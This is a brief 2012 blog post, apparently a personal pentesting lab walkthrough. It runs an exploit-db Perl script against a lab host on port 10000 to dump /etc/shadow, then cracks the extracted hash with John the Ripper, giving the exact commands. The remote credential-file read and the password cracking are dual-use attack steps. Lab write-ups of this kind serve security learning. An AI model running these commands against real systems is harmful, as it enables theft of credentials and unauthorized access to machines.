Thursday, September 13, 2012

Privilege Escalation part 2

now i will use john the ripper to crack the password

1. i will save the

root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.56.102 10000 /etc/shadow 0 >  /pentest/passwords/john/tes.txt


2. in here, i have edited the file tes.txt (just username obama)


then type this to crack the password
root@bt:/pentest/passwords/john# ./john tes.txt

3. type this to see the password
root@bt:/pentest/passwords/john# john -show tes.txt

No comments:

Post a Comment